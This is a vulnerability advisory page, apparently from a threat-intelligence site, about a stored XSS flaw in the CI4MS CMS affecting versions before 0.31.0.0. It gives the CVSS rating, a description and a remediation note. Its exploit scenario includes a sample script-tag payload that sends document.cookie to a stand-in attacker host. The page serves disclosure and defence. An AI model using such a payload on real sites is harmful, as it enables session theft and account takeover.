EUVD-2026-18074
GHSA-v897-c6vq-6cr3
Severity by source
AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
Lifecycle Timeline
4DescriptionGitHub Advisory
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings - Company Information. Several administrative configuration fields accept attacker-controlled input that is stored server-side and later rendered without proper output encoding. This issue has been patched in version 0.31.0.0.
AnalysisAI
Stored cross-site scripting (XSS) in CI4MS prior to version 0.31.0.0 allows authenticated high-privilege administrators to inject malicious scripts via unencoded System Settings - Company Information fields, which are later rendered to other users without proper output encoding. The vulnerability requires administrative privileges to exploit but poses a real risk in multi-user deployments where admin accounts may be compromised or where trust boundaries exist between administrative roles.
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Vulnerability AssessmentAI
| Risk Assessment | This vulnerability presents a moderate but meaningful risk despite the moderate CVSS score of 4.7. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A threat actor gains access to a CI4MS administrative account through phishing or credential compromise. The attacker navigates to System Settings, selects Company Information, and injects a JavaScript payload into the Company Name field (e.g., <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>). … |
| Remediation | Vendor-released patch: CI4MS version 0.31.0.0 and later. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Share
External POC / Exploit Code
Leaving vuln.today